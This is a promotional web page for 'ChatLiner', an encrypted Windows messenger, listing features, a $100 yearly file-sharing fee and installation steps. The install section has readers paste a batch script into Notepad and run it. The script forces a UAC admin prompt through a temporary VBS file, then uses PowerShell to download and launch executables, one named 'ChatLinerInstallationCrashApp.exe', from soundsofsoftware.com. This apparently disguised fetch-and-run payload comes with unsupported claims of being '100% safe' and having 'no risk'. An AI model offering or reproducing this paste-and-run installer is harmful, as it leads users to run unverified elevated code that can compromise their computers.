#An End-To-End Encryption-Based Messaging Platform For Secure Business And Private Communications, Digital Rights Management (DRM) And Blockchain Technology Utilization
ChatLiner is an ultra-fast and lightweight messaging app with end-to-end encryption that ensures secure communication and sharing of confidential files and information among its users.
ChatLiner guarantees that the content of your encrypted message cannot be decrypted and read by anyone other than the intended recipient.
ChatLiner equally successfully encrypts short messages and files containing large amounts of data, while functioning as an easy-to-use application at the same time.
There are three major rules that ChatLiner is governed by:
User privacy is respected and the possibility of unauthorized access and collection of data from the user's computer is excluded;
End-to-end encryption is implemented in such a way that sensitive data is stored under controlled conditions on the user's computer, not somewhere in the "cloud" or at a remote location where no one knows if the data could be misused;
User identification upon entering the system is performed using authentic technology based on artificial intelligence without exposing personal data.
#A set of features for uncompromising protection of sensitive data and user privacy
100% safe to use and free of viruses, malware, spyware or data collection of any kind
100% ad-free
No registration, submission of personal documents or entry of personal data required
No phone number required
Equally effective encryption of text messages and large amounts of data
100% safe to use and free of viruses, malware, spyware or data collection of any kind
100% ad-free
No registration, submission of personal documents or entry of personal data required
No phone number required
Equally effective encryption of text messages and large amounts of data
Each user is represented by a user name of their own choice
Send unlimited text and voice messages
Share unlimited files of any type or size
End-to-end encryption is always on
No risk of unauthorized access to the system
No risk of intercepting decrypted files and messages
No risk of server-side message decryption
Anonymity during correspondence is guaranteed
A streamlined blockchain platform with end-to-end encryption is enabled
#Download and install Chatliner for free
ChatLiner is a software designed to run on a computer running the Microsoft Windows operating system.
Installing the software is completely free and takes a few minutes. ChatLiner will take up less than 10 MB of disk space. There is no limit to the number of computers on which the application can be installed.
Files and messages are encrypted and shared within the app in such a way that it is unlikely that anyone could ever come up with a solution to fool the system or make it vulnerable to cyber attacks.
#Choose a different language
To view this content in Spanish, visit this page.
To view this content in Serbian, visit this page.
#To safely and quickly download and install the ChatLiner app, be sure to take the following steps (also watch our video installation guide that presents the installation process in real time):
Open a blank page in one of the popular word processors, such as NotePad, Notepad++ or WordPad.
Click the "Copy Text" button and copy the text inside the blue box (below the button) into one of the word processors listed above.
The copied content represents the source code of the installation file.
@echo off
set "params=%*"
cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )
SETLOCAL EnableDelayedExpansion
for /F "tokens=1,2 delims=#" %%a in ('"prompt #$H#$E# & echo on & for %%b in (1) do rem"') do (
set "DEL=%%a"
call :ColorText 0e "+ INSTALLING CHATLINER"
call :ColorText 0f "Do not close this window"
echo ...
goto :END
echo off
findstr /v /a:%1 /R "^$" "%~2" nul
del "%~2" > nul 2>&1
goto :eof
if not exist "C:\chatliner" mkdir C:\chatliner
echo en > "C:\chatliner\language.gmb"
powershell.exe wget https://soundsofsoftware.com/downloads/server.xml -OutFile C:/chatliner/server.xml
powershell.exe wget https://soundsofsoftware.com/downloads/ChatLinerInstallationCrashApp.exe -OutFile C:/chatliner/ChatLinerInstallationCrashApp.exe
powershell.exe wget https://soundsofsoftware.com/downloads/ChatLinerInstallation.exe -OutFile C:/chatliner/ChatLinerInstallation.exe
start "" "C:\chatliner\ChatLinerInstallation.exe"
call :ColorText 0b "OK. This script is closing now"
echo ...
ping -n 3 > nul
Save the file as a "batch" script with the extension .BAT. You can name it "installer.bat", for example, or you can give it any other name.
The saved batch file is the ChatLiner application installation file.
Double-click the saved file and wait a few seconds for the installation to begin. You will also need to accept the terms of use of this software (the so-called License Agreement).
After the installation is complete, you will be able to launch ChatLiner and start using it right away.
That's all it takes to download and install the ChatLiner app. If you have any questions or issues, feel free to send us a message.
#Pay annually for unlimited use
Sending text and audio messages through ChatLiner is free of charge. You can send an unlimited number of messages.
File sharing through ChatLiner costs $100 per year.
You can send an unlimited number of files. A 30-50% discount is possible in case of multiple user registrations.
Payment via PayPal is recommended.
If you want to make the payment in another way, please contact us so that we can send you the necessary instructions.
Once the payment is completed, you will receive a PIN code that you should keep secret. The PIN code is for your personal and private use only.
There are no additional costs or hidden fees.
#Your privacy remains guaranteed
The data entered during payment have nothing to do with the use of the app itself.
To use ChatLiner, you need to choose a unique username and generate a pair of crypto keys, while each individual user is assigned a digital ID card for identity verification.
You will never be asked for any sensitive or personal information and this is a policy that ChatLiner will always adhere to.
#ChatLiner End User License Agreement
By using this software ("Software", or "ChatLiner") owned by VIDYPS 79 d.o.o. ("Licensor"), you acknowledge and agree that the License Agreement sets out the business relationship between you and Licensor. The license is valid for an unlimited number of computers for a period of one year.
Visit this page for more information.
#Choose a different language
To view this content in Spanish, visit this page.
To view this content in Serbian, visit this page.
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#End-to-end encryption in the truest sense of the word: ChatLiner, at your service
#Since its founding in 2008, VIDYPS 79 d.o.o. has been dedicated to developing and giving rise to widely recognized, authentic and viable business platforms based on innovative and industrially applicable solutions. ChatLiner stands out as an authentic product operating in this environment.